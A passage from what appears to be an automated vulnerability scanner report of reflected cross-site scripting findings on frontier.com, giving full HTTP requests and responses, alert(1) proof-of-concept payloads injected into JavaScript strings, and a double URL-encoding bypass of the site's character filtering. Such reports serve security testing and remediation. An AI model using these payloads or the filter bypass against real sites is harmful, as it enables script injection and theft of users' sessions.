Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /yahoo69d70'%3b8506878fe2/fy_excl2.aspx HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:31:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43315


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?aspxerrorpath=/yahoo69d70';8506878fe2/fy_excl2.aspx');//]]>
...[SNIP]...

2.91. http://www.frontier.com/yahoo/fy_excl2.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /yahoo/fy_excl2.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce was submitted in the REST URL parameter 2. This input was echoed as 747f9';alert(1)//cb0ef15e2ce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /yahoo/fy_excl2.aspx747f9%2527%253balert%25281%2529%252f%252fcb0ef15e2ce HTTP/1.1
Host: www.frontier.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:32:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43633


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('http://www.frontier.com/PageNotFound.aspx?404;http://www.frontier.com:80/yahoo/fy_excl2.aspx747f9';alert(1)//cb0ef15e2ce');//]]>
...[SNIP]...

2.92. https://www.frontier.com/AgentOrdering/Login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dcc6'%3balert(1)//b78c0a9a96c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7dcc6';alert(1)//b78c0a9a96c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrdering/Login/?7dcc6'%3balert(1)//b78c0a9a96c=1 HTTP/1.1
Host: www.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.20T0x0000000e_0xc7da850aCMYIL; s_cc=true; ASP.NET_SessionId=prjxq13zplqa01qcdfmwqt45; s_sq=cznfrontier%3D%2526pid%253DFrontier.com%252520%25253A%2525202011%252520Commercial%252520Summer%252520Offer%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Ffrontier.com%25252FAgentOrdering%25252FLogin%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"><
...[SNIP]...
<![CDATA[
$('#hiddenRedirectHREFAfterValidation').val('https://www.frontier.com/AgentOrdering/Login/Default.aspx?7dcc6';alert(1)//b78c0a9a96c=1');
var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return Va
...[SNIP]...

2.93. https://www.frontier.com/AgentOrdering/Login/Default.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.frontier.com
Path:   /AgentOrdering/Login/Default.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf4af'-alert(1)-'9ff1a208c26e1167f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AgentOrderingcf4af'-alert(1)-'9ff1a208c26e1167f/Login/Default.aspx?__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTQyNjYzNDI3OA9kFgJmD2QWAmYPZBYEAgkPFgIeBFRleHQFow48ZGl2IGlkPSJoZWFkZXIiPgogIDxkaXYgY2xhc3M9ImhlYWRlck5hdiI%2BCiAgICA8ZGl2IGlkPSJsZWZ0SGVhZGVyIj4KICAgICAgPGRpdiBjbGFzcz0ibG9nbyI%2BCiAgICAgICAgPGEgaWQ9ImhvbWVMaW5rIiB0aXRsZT0iRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMiIGhyZWY9Ii8iPgogICAgICAgICAgPGltZyBhbHQ9IkZyb250aWVyTG9nbyIgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vZnJvbnRpZXJfTG9nby5qcGciIGJvcmRlcj0iMCIgaGVpZ2h0PSI1MSIgd2lkdGg9IjE1NiI%2BCiAgICAgICAgPC9hPgogICAgICA8L2Rpdj4KICAgICAgPHVsIGlkPSJkcm9wZG93bl9uYXYiPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvQmlsbFBheS9Mb2dpbi5hc3B4Ij5PbmxpbmUgQmlsbCBQYXk8L2E%2BPC9saT4KICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2Zyb250aWVyLm15LnlhaG9vLmNvbS8iPkZyb250aWVyIE15IFlhaG9vITwvYT48L2xpPgogICAgICAgIDxsaT48YSBocmVmPSJodHRwczovL2xvZ2luLmZyb250aWVyLmNvbS93ZWJtYWlsLyI%2BRnJvbnRpZXIgTWFpbDwvYT48L2xpPgogICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb25PTkxZTEVHQUNZIiBocmVmPSIvU2hvcC9Mb2dpbi5hc3B4Ij5NeSBBY2NvdW50PC9hPjwvbGk%2BCiAgICAgICAgPGxpIGlkPSJzZWxlY3RlZCIgY2xhc3M9ImFnZW50bG9naW4iPkFnZW50IExvZ2luIAogICAgICAgICAgPGRpdiBjbGFzcz0iYXJyb3ciPjxpbWcgc3JjPSIvaW1hZ2VzL0ZUUk1haW4vc21hbGxfYXJyb3cucG5nIiBib3JkZXI9IjAiIGhlaWdodD0iNCIgd2lkdGg9IjciPjwvZGl2PgogICAgICAgICAgPHVsPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0FnZW50T3JkZXJpbmcvTG9naW4vIj5SZXNpZGVudGlhbCBBZ2VudDwvYT48L2xpPgogICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iL0J1c2luZXNzQWdlbnRPcmRlci9Mb2dpbi8iPkJ1c2luZXNzIEFnZW50PC9hPjwvbGk%2BCiAgICAgICAgICA8L3VsPgogICAgICAgIDwvbGk%2BCiAgICAgIDwvdWw%2BCiAgICAgIDxkaXYgY2xhc3M9ImxvY2F0aW9uIj5DdXJyZW50IExvY2F0aW9uOgogICAgICAgIDxhIGlkPSJMb2NhbGUiIGNsYXNzPSJjaGFuZ2VMb2NhbGUiIGhyZWY9IiMiPlNlbGVjdCBMb2NhdGlvbjwvYT4KICAgICAgPC9kaXY%2BCiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9InJpZ2h0SGVhZGVyIj4KICAgICAgPGZvcm0gYWN0aW9uPSIjIj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCb3giPgogICAgICAgICAgPGlucHV0IGlkPSJ0eHRTZWFyY2giIGNsYXNzPSJzZWFyY2hUZXh0IiBuYW1lPSJ0eHRTZWFyY2giPgogICAgICAgICAgPGlucHV0IGlkPSJidG5TZWFyY2giIGNsYXNzPSJTZWFyY2hCdXR0b24iIHZhbHVlPSIiIHNyYz0iL0ltYWdlcy9GVFJNYWluL3NlYWNoX2J0bi5naWYiIG5hbWU9ImJ0blNlYXJjaCIgdHlwZT0iaW1hZ2UiPiA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJzZWFyY2hCdXR0b25zIj4KICAgICAgICAgIDxpbnB1dCB2YWx1ZT0iRnJvbnRpZXIiIGNoZWNrZWQ9ImNoZWNrZWQiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNGTGluayI%2BU2VhcmNoIEZyb250aWVyPC9zcGFuPgogICAgICAgICAgPGlucHV0IHZhbHVlPSJQb3J0YWwiIG5hbWU9InJkb1NlYXJjaCIgdHlwZT0icmFkaW8iPgogICAgICAgICAgPHNwYW4gaWQ9IlNXTGluayI%2BU2VhcmNoIHRoZSBXZWI8L3NwYW4%2BCiAgICAgICAgPC9kaXY%2BCiAgICAgIDwvZm9ybT4KICAgIDwvZGl2PgogIDwvZGl2Pgo8L2Rpdj5kAgsPZBYMAgEPZBYCAgEPZBYCZg9kFgJmD2QWAgIBD2QWBgIHDw8WBB8ABQ1FbnRlciBQaG9uZSAjHgtOYXZpZ2F0ZVVybAVKL1JlZ2lvbi9EZWZhdWx0LmFzcHg%2FdHlwZT0xJnVybD0lMmZBZ2VudE9yZGVyaW5nJTJmTG9naW4lMmZEZWZhdWx0LmFzcHglM2ZkZAIJDw8WAh8BBUovUmVnaW9uL0RlZmF1bHQuYXNweD90eXBlPTEmdXJsPSUyZkFnZW50T3JkZXJpbmclMmZMb2dpbiUyZkRlZmF1bHQuYXNweCUzZmRkAgsPDxYCHgdWaXNpYmxlaGRkAgMPZBYCAgEPZBYCZg8WAh8ABbwBPGRpdiBpZD0iVG9wTmF2X0NvbnRhaW5lciI%2BDQoJCTwvZGl2Pg0KPGlucHV0IG5hbWU9ImhmUGFnZVR5cGUiIHR5cGU9ImhpZGRlbiIgaWQ9ImhmUGFnZVR5cGUiIHZhbHVlPSIxIi8%2BDQo8aW5wdXQgbmFtZT0iaGZSZWNvcmRfVHlwZSIgdHlwZT0iaGlkZGVuIiBpZD0iaGZSZWNvcmRfVHlwZSIgdmFsdWU9IkNhdGVnb3J5Ii8%2BDQpkAgkPZBYGAgEPDxYCHwJnZBYCAgEPFgQfAAVjPGEgaHJlZj0iL0RlZmF1bHQuYXNweCI%2BSG9tZTwvYT4gJnJhcXVvOyA8YSBocmVnPSIvQWdlbnRPcmRlcmluZy8iPkFnZW50IE9yZGVyaW5nPC9hPiAmcmFxdW87IExvZ2luHwJnZAIDDxYCHwJoZAIFD2QWBAIBDxYCHwAF%2FAE8cD48c3Ryb25nPkxvZ2luIEZvciBGcm9udGllciBBZ2VudHMvUGFydG5lcnMgT25seS4gIEN1c3RvbWVycyBwbGVhc2UgdmlzaXQgPGJyPiA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbSI%2BRnJvbnRpZXIgUmVzaWRlbnRpYWwgSG9tZSBQYWdlPC9hPiBvciA8YSBocmVmPSJodHRwOi8vd3d3LmZyb250aWVyLmNvbS9DdXN0b21lclNlcnZpY2UvIj5Db250YWN0IFVzIFBhZ2U8L2E%2BIGZvciBBc3Npc3RhbmNlLjwvc3Ryb25nPjwvcD5kAg8PDxYCHgxFcnJvck1lc3NhZ2UFjgc8cCBhbGlnbj0ibGVmdCI%2BDQoJCQkJPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5Zb3UgaGF2ZSBlbnRlcmVkIGFuIEludmFsaWQgVXNlcm5hbWUgb3IgUGFzc3dvcmQuIFBsZWFzZSBub3RlIHRoYXQgdGhpcyBsb2dpbiBpcyBmb3IgQWdlbnRzL1BhcnRuZXJzIG9mIEZyb250aWVyIENvbW11bmljYXRpb25zIG9ubHkuPC9zcGFuPiA8L3A%2BDQo8dWw%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGEgUmVzaWRlbnRpYWwgQ3VzdG9tZXIsIHBsZWFzZSBjb250YWN0IDEtODAwLTkyMS04MTAxIG9yIHZpc2l0IHRoZSA8L3NwYW4%2BPGEgdGl0bGU9IlJlc2lkZW50aWFsIENvbnRhY3QgVXMgcGFnZSIgaHJlZj0iL2N1c3RvbWVyc2VydmljZS8iIHRhcmdldD0iX3NlbGYiPjxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BUmVzaWRlbnRpYWwgQ29udGFjdCBVcyBwYWdlPC9zcGFuPjwvYT7CoDxzcGFuIHN0eWxlPSJDT0xPUjogI2ZmMDAwMCI%2BdG8gcmVhY2ggQ3VzdG9tZXIgU2VydmljZS48L3NwYW4%2BPC9kaXY%2BPC9saT4NCjxwIGFsaWduPSJsZWZ0Ij48c3BhbiBzdHlsZT0iQ09MT1I6ICNmZjAwMDAiPjwvc3Bhbj48L3A%2BDQo8cCBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj48L3NwYW4%2BPC9wPg0KPGxpPg0KPGRpdiBhbGlnbj0ibGVmdCI%2BPHNwYW4gc3R5bGU9IkNPTE9SOiAjZmYwMDAwIj5JZiB5b3UgYXJlIGFuIEFnZW50L1BhcnRuZXIgb2YgRnJvbnRpZXIgQ29tbXVuaWNhdGlvbnMgYW5kIG5lZWQgYXNzaXN0YW5jZSB3aXRoIHlvdXIgTG9naW4sIHBsZWFzZSBjb250YWN0IDEtODY2LTc0NS05MTIyLjwvc3Bhbj48L2Rpdj48L2xpPg0KPHA%2BPC9wPjwvdWw%2BZGQCDQ8PFgIfAmhkZAIRD2QWAmYPFgIfAAXQGTxkaXYgY2xhc3M9ImZvb3RlciI%2BDQogICAgPGRpdiBjbGFzcz0iZm9vdGVyLXNlY3Rpb25zIj4NCiAgICAgICAgPGRpdiBpZD0iaGVscFN1cHBvcnQiPg0KICAgICAgICAgICAgPHVsPg0KICAgICAgICAgICAgICAgIDxsaSBjbGFzcz0iZm9vdGVyX2hlYWRpbmdzIj5IZWxwICZhbXA7IFN1cHBvcnQgPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvY3VzdG9tZXJzZXJ2aWNlLyI%2BQ29udGFjdCBGcm9udGllcjwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvYmlsbGluZy8iPkJpbGxpbmcgJmFtcDsgUGF5bWVudCBJbmZvcm1hdGlvbjwvYT4NCiAgICAgICAgICAgICAgICA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9jYXJyaWVyZnJlZXplLyI%2BUHJvdGVjdCBZb3VyIEFjY291bnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL3JldGFpbHN0b3Jlcy8iPkxvY2F0ZSBSZXRhaWwgU3RvcmVzPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Imh0dHA6Ly93d3cuZnJvbnRpZXJoZWxwLmNvbS90ZWNoc3VwcG9ydCI%2BVGVjaG5pY2FsDQogICAgICAgICAgICAgICAgICAgIFN1cHBvcnQ8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICA8L3VsPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBjbGFzcz0iQm90dG9tX3NwYWNlciI%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGlkPSJwcm9ncmFtcyI%2BDQogICAgICAgICAgICA8dWw%2BDQogICAgICAgICAgICAgICAgPGxpIGNsYXNzPSJmb290ZXJfaGVhZGluZ3MiPlF1aWNrIExpbmtzPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSJodHRwczovL2Zyb250aWVyLmdsb2J5c29ubGluZS5jb20vY3Yvc2NyaXB0cy9BQkUwL2VuZy9sb2cuYXNwP2dydT00Mzc2NjI5MTAmYW1wO3NlYz0iPg0KICAgICAgICAgICAgICAgICAgICBCdXNpbmVzcyBPbmxpbmUgQmlsbCBQYXk8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGNsYXNzPSJDaGVja0ZvclJlZ2lvbiIgaHJlZj0iL2ZyaWVuZGxpbmsvIj5DdXN0b21lciBSZWZlcnJhbDwvYT4gPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvZG9uYXRlLyI%2BR3JlYXQgRnJvbnRpZXIgRG9uYXRlPC9hPiA8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBjbGFzcz0iQ2hlY2tGb3JSZWdpb24iIGhyZWY9Ii9kaXNjb3VudHByb2dyYW1zLyI%2BRGlzY291bnQgUHJvZ3JhbXM8L2E%2BIDwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9hZHZlcnRpc2UvIj5BZHZlcnRpc2Ugd2l0aCBVczwvYT4gPC9saT4NCiAgICAgICAgICAgIDwvdWw%2BDQogICAgICAgIDwvZGl2Pg0KICAgICAgICA8ZGl2IGNsYXNzPSJCb3R0b21fc3BhY2VyIj4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgaWQ9ImFib3V0Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BQWJvdXQgVXM8L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvY29ycG9yYXRlX2NvbW11bmljYXRpb25zLyI%2BQ29ycG9yYXRlIENvbW11bmljYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9jb3Jwb3JhdGUuZnJvbnRpZXIuY29tL2RlZmF1bHQuYXNweD9tPTUmYW1wO3A9NDMiPkNhcmVlcnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL3BoeC5jb3Jwb3JhdGUtaXIubmV0L3Bob2VuaXguemh0bWw%2FYz02NjUwOCZhbXA7cD1pcm9sLWlyaG9tZSI%2BSW52ZXN0b3INCiAgICAgICAgICAgICAgICAgICAgUmVsYXRpb25zPC9hPjwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Imh0dHA6Ly9waHguY29ycG9yYXRlLWlyLm5ldC9waG9lbml4LnpodG1sP2M9NjY1MDgmYW1wO3A9aXJvbC1uZXdzJmFtcDtueW89MCI%2BDQogICAgICAgICAgICAgICAgICAgIFByZXNzIFJvb208L2E%2BPC9saT48bGk%2BPGEgaHJlZj0iL2ZhY2VzX29mX2Zyb250aWVyIj5GYWNlcyBvZiBGcm9udGllcjwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxkaXYgY2xhc3M9IkJvdHRvbV9zcGFjZXIiPg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGVnYWxSZWd1bGF0b3J5Ij4NCiAgICAgICAgICAgIDx1bD4NCiAgICAgICAgICAgICAgICA8bGkgY2xhc3M9ImZvb3Rlcl9oZWFkaW5ncyI%2BTGVnYWwgJmFtcDsgUmVndWxhdG9yeTwvbGk%2BDQogICAgICAgICAgICAgICAgPGxpPjxhIGhyZWY9Ii9wb2xpY2llcy8iPlBvbGljaWVzICZhbXA7IE5vdGlmaWNhdGlvbnM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgY2xhc3M9IkNoZWNrRm9yUmVnaW9uIiBocmVmPSIvdGVybXMvIj5UZXJtcyBhbmQgQ29uZGl0aW9uczwvYT48L2xpPg0KICAgICAgICAgICAgICAgIDxsaT48YSBocmVmPSIvd2hvbGVzYWxlLyI%2BV2hvbGVzYWxlICZhbXA7IENhcnJpZXIgU2VydmljZXM8L2E%2BPC9saT4NCiAgICAgICAgICAgICAgICA8bGk%2BPGEgaHJlZj0iaHR0cDovL2NhcnJpZXIuZnJvbnRpZXJjb3JwLmNvbS9jcnRmL3RhcmlmZnMvaW5kZXguY2ZtP2Z1c2VhY3Rpb249bWFpbiZhbXA7c2N0bklEPTE5Ij4NCiAgICAgICAgICAgICAgICAgICAgVGFyaWZmczwvYT48L2xpPg0KICAgICAgICAgICAgPC91bD4NCiAgICAgICAgPC9kaXY%2BDQogICAgICAgIDxwIGNsYXNzPSJjbGVhciI%2BDQogICAgICAgIDwvcD4NCiAgICAgICAgPGRpdiBpZD0iZm9vdGVyQ3JlZGl0cyI%2BDQogICAgICAgICAgICA8ZGl2Pg0KICAgICAgICAgICAgICAgIDxzdHJvbmc%2BJmNvcHk7MjAxMSBGcm9udGllciBDb21tdW5pY2F0aW9ucyBDb3Jwb3JhdGlvbi4gQWxsIHJpZ2h0cyByZXNlcnZlZC48L3N0cm9uZz4NCiAgICAgICAgICAgIDwvZGl2Pg0KICAgICAgICAgICAgPCEtLQk8aW1nIHN0eWxlPSJmbG9hdDogcmlnaHQ7IiB3aWR0aD0iMzM5cHgiIGhlaWdodD0iMzdweCIgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL3Bob25lX2NvcHkucG5nIiAgLz4tLT4NCiAgICAgICAgPC9kaXY%2BDQogICAgPC9kaXY%2BDQo8L2Rpdj5kAhMPFgIfAAWJITxicj4KPCEtLU1hcmt1cCBmb3IgSW5pdGlhbCBPdmVybGF5IHRoYXQgY2Fubm90IGJlIGNsb3NlZCB3aXRob3V0IHN1Ym1pdHRpbmcgcGhvbmUvemlwLS0%2BCjxkaXYgaWQ9Im92ZXJTY3JlZW4iPiZuYnNwOzwvZGl2Pgo8ZGl2IGlkPSJvdmVybGF5SW5pdGlhbEZvcm0iIGNsYXNzPSJvdmVybGF5Ij4KICAgIDxpbWcgYWx0PSIiIHNyYz0iL2ltYWdlcy9GVFJNYWluL2dyYWRpZW50Qm94LnBuZyIgaGVpZ2h0PSIyNjMiIHdpZHRoPSI2NDAiPgogICAgPGRpdiBjbGFzcz0ib3ZlcmxheUlubmVyIj4KICAgICAgICA8aDE%2BSGVsbG8hPC9oMT4KICAgICAgICA8cD5UbyBwcm92aWRlIHlvdSB3aXRoIHByb2R1Y3RzIGFuZCBzZXJ2aWNlcyB0aGF0IGJlc3QgbWVldCB5b3VyIG5lZWRzLCB3ZSBuZWVkIHRvIGtub3cgeW91ciBsb2NhdGlvbi4gVGhpcyBpbmZvcm1hdGlvbiBpcyBrZXB0IHByaXZhdGUhPC9wPgogICAgICAgIDxmb3JtIG5hbWU9ImZGb3JtMSIgYWN0aW9uPSIjIiBtZXRob2Q9InBvc3QiPgogICAgICAgICAgICA8ZGl2IGlkPSJlcnJvckZpZWxkMSIgY2xhc3M9Im92ZXJsYXlFcnJvciI%2BUGxlYXNlIGVudGVyIGEgdmFsaWQgcGhvbmUgbnVtYmVyIG9yIHppcCBjb2RlLjwvZGl2PgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUxpbmUiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0icGhvbmUiPlBob25lIE51bWJlcjwvbGFiZWw%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUZpZWxkIj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUFmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUEiIG5hbWU9InBob25lTnVtQSIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQicpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAxIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUJmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjMiIGlkPSJwaG9uZU51bUIiIG5hbWU9InBob25lTnVtQiIgb25rZXl1cD0icmV0dXJuIHRyYXBLZXlzKGV2ZW50LHRoaXMsJ3Bob25lTnVtQycpOyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgdGhyZWUtZGlnIHAyIiB0eXBlPSJ0ZXh0Ij4KICAgICAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJwaG9uZUNmaWVsZCI%2BCiAgICAgICAgICAgICAgICAgICAgICAgIDxpbnB1dCBtYXhsZW5ndGg9IjQiIGlkPSJwaG9uZU51bUMiIG5hbWU9InBob25lTnVtQyIgdmFsdWU9IiIgY2xhc3M9ImRlcHRoSW5wdXQgZm91ci1kaWcgcDMiIHR5cGU9InRleHQiPjwvZGl2PgogICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPC9kaXY%2BCiAgICAgICAgICAgICAgICA8ZGl2IGNsYXNzPSJ6aXBMaW5lIj4KICAgICAgICAgICAgICAgICAgICA8bGFiZWw%2Bb3IgWmlwIENvZGU8L2xhYmVsPgogICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9InppcEZpZWxkIj48aW5wdXQgbWF4bGVuZ3RoPSI1IiBuYW1lPSJ6aXBDb2RlIiB2YWx1ZT0